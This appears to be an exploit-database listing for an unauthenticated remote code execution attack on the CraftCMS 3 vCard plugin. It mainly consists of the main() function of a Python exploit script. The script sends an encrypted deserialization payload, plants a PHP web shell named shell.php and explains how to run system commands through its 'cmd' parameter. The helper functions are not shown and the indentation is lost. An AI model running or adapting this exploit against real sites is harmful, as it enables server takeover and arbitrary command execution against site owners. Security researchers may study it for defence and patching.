Exploits / Vulnerability Discovered : 2020-05-20 |
Type : webapps |
Platform : php
This exploit / vulnerability Craftcms 3 vcard plugin 1.0.0 remote code execution is for educational purposes only and if it is used you will do on your own risk!
def main():
parser = argparse.ArgumentParser(description="Unauthenticated RCE for CraftCMS vCard Plugin")
parser.add_argument('-u',dest='url',required=True,help="The URL for the vCard download without the vCard value\nExample: http://craftcms/index.php?p=actions/vcard/default/index&vcard=")
parser.add_argument('-s',dest='salt',default="s34s4L7",help="Security key required for encrypting payload. Defaul is 's34s4L7'")
parser.add_argument('-f',dest='fname',default="shell.php",help="File path/name to use as value in upload path: ./<value> . Use a PHP extension. Default value is 'shell.php'")
if len(sys.argv)<3:
parser.print_help()
sys.exit(0)
args = parser.parse_args()
attPayload = generatePayload(args.fname)
serPayload = encryptPayload(attPayload,args.salt)
if exploitCard(args.url,serPayload) == 500:
print("Deserialization has been triggered, navigate to craftCMS webroot/"+ args.fname +"\nUse GET parameter 'cmd' to execute commands\nExample: https://craftcms/"+ args.fname +"?cmd=ls%20-al;whoami;ip%20a\n")